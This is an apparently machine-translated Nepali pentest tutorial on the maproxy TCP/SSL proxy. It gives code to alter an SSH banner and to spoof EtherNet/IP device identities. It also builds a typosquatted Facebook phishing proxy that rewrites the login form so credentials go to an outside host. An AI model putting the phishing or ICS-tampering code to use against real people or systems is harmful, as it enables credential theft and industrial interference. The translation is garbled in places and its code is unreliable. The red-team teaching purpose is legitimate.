फ्लाई मा नेटवर्क डाटा प्रक्रिया

लेखको अनुवाद पाठ्यक्रमको सुरुवातको पूर्वसन्ध्यामा तयार गरिएको थियो "पेन्टेस्ट। प्रवेश परीक्षण अभ्यास".

एनोटेसन

IoT/ICS उपकरणहरू र SCADA ह्याक गर्ने नियमित प्रवेश परीक्षण र रातो टोली सञ्चालनदेखि लिएर विभिन्न प्रकारका सुरक्षा मूल्याङ्कनहरू, बाइनरी नेटवर्क प्रोटोकलहरूसँग काम गर्ने, अर्थात् क्लाइन्ट र लक्ष्य बीचको नेटवर्क डाटा अनिवार्य रूपमा अवरोध गर्ने र परिमार्जन गर्ने समावेश गर्दछ। हामीसँग Wireshark, Tcpdump वा Scapy जस्ता उपकरणहरू भएकाले नेटवर्क ट्राफिक स्निफिङ गर्नु गाह्रो काम होइन, तर परिमार्जन बढी श्रम-गहन कार्य जस्तो देखिन्छ किनभने हामीसँग नेटवर्क डाटा पढ्न, यसलाई फिल्टर गर्न, परिवर्तन गर्नको लागि कुनै प्रकारको इन्टरफेस चाहिन्छ। यो उडानमा र लगभग वास्तविक समयमा लक्षित होस्टमा फिर्ता पठाउनुहोस्। थप रूपमा, यो आदर्श हुनेछ यदि यस्तो उपकरणले स्वचालित रूपमा बहु समानान्तर जडानहरूसँग काम गर्न सक्छ र स्क्रिप्टहरू प्रयोग गरेर अनुकूलन योग्य हुन सक्छ।

एक दिन मैले एउटा उपकरण फेला पारे maproxy, कागजातले चाँडै मलाई यो स्पष्ट गर्यो maproxy - मलाई के चाहिन्छ। यो एकदम सरल, बहुमुखी र सजिलै कन्फिगर गर्न मिल्ने TCP प्रोक्सी हो। यो उपकरणले धेरै समानान्तर जडानहरू ह्यान्डल गर्न सक्छ कि भनेर हेर्नको लागि ICS उपकरणहरू (जसले धेरै प्याकेटहरू उत्पन्न गर्दछ) सहित धेरै जटिल अनुप्रयोगहरूमा यो उपकरणको परीक्षण गरें, र उपकरणले राम्रो प्रदर्शन गर्यो।

यस लेखले तपाईंलाई फ्लाईमा नेटवर्क डाटा प्रशोधन गर्न परिचय दिनेछ maproxy.

सिंहावलोकन

उपकरण maproxy पाइथन मा एक लोकप्रिय र परिपक्व एसिन्क्रोनस नेटवर्किंग फ्रेमवर्क, Tornado मा आधारित छ।

सामान्यतया, यसले धेरै मोडहरूमा काम गर्न सक्छ:

• TCP:TCP - एन्क्रिप्ट नगरिएको TCP जडानहरू;
• TCP:SSL и SSL:TCP - एकतर्फी इन्क्रिप्शन संग;
• SSL:SSL - दुई-तरफा ईन्क्रिप्शन।

यो पुस्तकालयको रूपमा आउँछ। द्रुत सुरुवातको लागि, तपाईंले मुख्य प्रतिबिम्बित गर्ने उदाहरण फाइलहरू प्रयोग गर्न सक्नुहुन्छ पुस्तकालय कार्यहरू:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

केस १ - साधारण द्विदिशात्मक प्रोक्सी

मा आधारित tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

पूर्वनिर्धारित ProxyServer() दुई तर्कहरू लिन्छ - जडान स्थान र लक्ष्य पोर्ट। server.listen() एउटा तर्क लिन्छ - आगमन जडान सुन्नको लागि पोर्ट।

स्क्रिप्ट कार्यान्वयन गर्दै:

# python tcp2tcp.py

परीक्षण चलाउनको लागि, हामी हाम्रो प्रोक्सी स्क्रिप्ट मार्फत स्थानीय SSH सर्भरमा जडान गर्न जाँदैछौं, जसले सुन्दछ। 2222/tcp पोर्ट र मानक पोर्टमा जडान हुन्छ 22/tcp SSH सर्भरहरू:

स्वागत ब्यानरले तपाईंलाई सूचित गर्दछ कि हाम्रो उदाहरण लिपिले नेटवर्क ट्राफिकलाई सफलतापूर्वक प्रोक्सी गरेको छ।

केस २ - डाटा परिमार्जन

अर्को डेमो स्क्रिप्ट logging_proxy.py नेटवर्क डाटा संग अन्तरक्रिया को लागी आदर्श। फाइलमा भएका टिप्पणीहरूले तपाइँको लक्ष्य प्राप्त गर्न परिमार्जन गर्न सक्ने कक्षा विधिहरू वर्णन गर्दछ:

सबैभन्दा रोचक कुरा यहाँ छ:

• on_c2p_done_read - क्लाइन्टबाट सर्भरमा जाने बाटोमा डेटा अवरोध गर्न;
• on_p2s_done_read - उल्टो।

सर्भरले ग्राहकलाई फर्काउने SSH ब्यानर परिवर्तन गर्ने प्रयास गरौं:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

स्क्रिप्ट कार्यान्वयन गर्नुहोस्:

तपाईले देख्न सक्नुहुने रूपमा, ग्राहकलाई बहकाइएको थियो किनभने उनको लागि SSH सर्भर नाम परिवर्तन गरिएको थियो «DumnySSH».

केस ३ - साधारण फिसिङ वेब पृष्ठ

यो उपकरण प्रयोग गर्न अनन्त तरिकाहरू छन्। यस पटक रातो टोली सञ्चालन पक्षबाट थप व्यावहारिक कुरामा ध्यान केन्द्रित गरौं। अवतरण पृष्ठ अनुकरण गरौं m.facebook.com र जानाजानी टाइपो संग एक अनुकूलन डोमेन प्रयोग गर्नुहोस्, उदाहरण को लागी, m.facebok.com। प्रदर्शन उद्देश्यका लागि, डोमेन हामीद्वारा दर्ता गरिएको हो भनी मानौं।

हामी हाम्रो पीडित प्रोक्सी र फेसबुक सर्भर (31.13.81.36)। यो उदाहरण काम गर्नको लागि, हामीले HTTP होस्ट हेडरलाई प्रतिस्थापन गर्न र सही होस्टनाम इन्जेक्सन गर्न आवश्यक छ, र हामी प्रतिक्रिया कम्प्रेसनलाई पनि असक्षम पार्नेछौं ताकि हामी सामग्रीहरू सजिलैसँग पहुँच गर्न सक्छौं। अन्ततः हामी HTML फारम प्रतिस्थापन गर्नेछौं ताकि लगइन प्रमाणहरू हामीलाई Facebook को सर्भरको सट्टा पठाइयोस्:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/ne/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

सारांशमा:

तपाईले देख्न सक्नुहुने रूपमा, हामी सफलतापूर्वक मूल साइट बदल्न सक्षम भयौं।

केस 4 - पोर्टिङ्ग इथरनेट/आईपी

मैले केही समयदेखि औद्योगिक उपकरणहरू र सफ्टवेयरहरू (ICS/SCADA) सँग काम गरिरहेको छु, जस्तै प्रोग्रामेबल कन्ट्रोलरहरू (PLC), I/O मोड्युलहरू, ड्राइभहरू, रिलेहरू, सीढी प्रोग्रामिङ वातावरणहरू र अन्य धेरै। यो मामला औद्योगिक चीजहरू मन पराउनेहरूको लागि हो। त्यस्ता समाधानहरू ह्याक गर्नु भनेको नेटवर्क प्रोटोकलहरूसँग सक्रिय रूपमा खेल्नु समावेश छ। निम्न उदाहरणमा, म तपाइँ कसरी ICS/SCADA नेटवर्क ट्राफिक परिमार्जन गर्न सक्नुहुन्छ भनेर देखाउन चाहन्छु।

यसको लागि तपाईलाई निम्न आवश्यक पर्दछ:

• नेटवर्क स्निफर, उदाहरणका लागि, Wireshark;
• इथरनेट/आईपी वा केवल एक एसआईपी यन्त्र, तपाइँ यसलाई Shodan सेवा प्रयोग गरेर फेला पार्न सक्नुहुन्छ;
• हाम्रो स्क्रिप्ट आधारित छ maproxy.

पहिले, CIP (सामान्य औद्योगिक प्रोटोकल) बाट एक विशिष्ट पहिचान प्रतिक्रिया कस्तो देखिन्छ हेरौं:

यन्त्र पहिचान ईथरनेट/आईपी प्रोटोकल प्रयोग गरेर पूरा गरिन्छ, जुन औद्योगिक इथरनेट प्रोटोकलको परिष्कृत संस्करण हो जसले CIP जस्ता नियन्त्रण प्रोटोकलहरू लपेट्छ। हामी स्क्रिनसटमा देखिने हाइलाइट गरिएको आईडी नाम परिवर्तन गर्न जाँदैछौं "इथरनेटको लागि NI-IndComm" हाम्रो प्रोक्सी लिपि प्रयोग गर्दै। हामी स्क्रिप्ट पुन: प्रयोग गर्न सक्छौं logging_proxy.py र त्यसै गरी कक्षा विधि परिमार्जन गर्नुहोस् on_p2s_done_read, किनभने हामी ग्राहकमा फरक पहिचान नाम देखिन चाहन्छौं।

कोड:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

अनिवार्य रूपमा, हामीले दुई पटक यन्त्र पहिचानको लागि सोध्यौं, दोस्रो प्रतिक्रिया मूल थियो, र पहिलो उडानमा परिमार्जन गरिएको थियो।

र अन्तमा

मेरो विचारमा maproxy एक सुविधाजनक र सरल उपकरण, जुन पाइथनमा पनि लेखिएको छ, त्यसैले म विश्वास गर्छु कि तपाईंले पनि यसलाई प्रयोग गरेर लाभ उठाउन सक्नुहुन्छ। निस्सन्देह, नेटवर्क डेटा प्रशोधन र परिमार्जन गर्नका लागि थप जटिल उपकरणहरू छन्, तर तिनीहरू पनि थप ध्यान चाहिन्छ र सामान्यतया एक विशेष प्रयोग केसको लागि सिर्जना गरिन्छ, उदाहरणका लागि। मुरैना, मोडलिशका वा evilginx तेस्रो जस्तै मामलाहरु को लागी, वा canape अन्तिम मामला को लागी। एक तरिका वा अर्को, मद्दत संग maproxy उदाहरण स्क्रिप्टहरू धेरै स्पष्ट भएकाले तपाईँले नेटवर्क डेटा अवरोध गर्ने आफ्नो विचारहरू द्रुत रूपमा कार्यान्वयन गर्न सक्नुहुन्छ।

Windows AD मा प्रमाणीकरण संयन्त्र परीक्षण गर्दै

स्रोत: www.habr.com